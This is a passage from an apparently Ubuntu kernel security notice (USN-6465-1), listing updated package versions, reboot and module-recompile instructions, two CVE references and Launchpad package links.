5.15.0.1047.53~20.04.1   linux-image-virtual-hwe-20.04   5.15.0.88.98~20.04.46After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6465-1   CVE-2023-31083, CVE-2023-3772Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-88.98   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1049.54   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1051.59   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1051.59.1   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1046.54   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1032.38   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1042.45   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1046.51   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-88.98   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1040.40   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1047.53   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1049.54~20.04.1   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1051.59~20.04.1 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1051.59~20.04.1.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1046.54~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1032.38~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-88.98~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1042.45~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-88.98~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1047.53~20.04.1

Tag

#web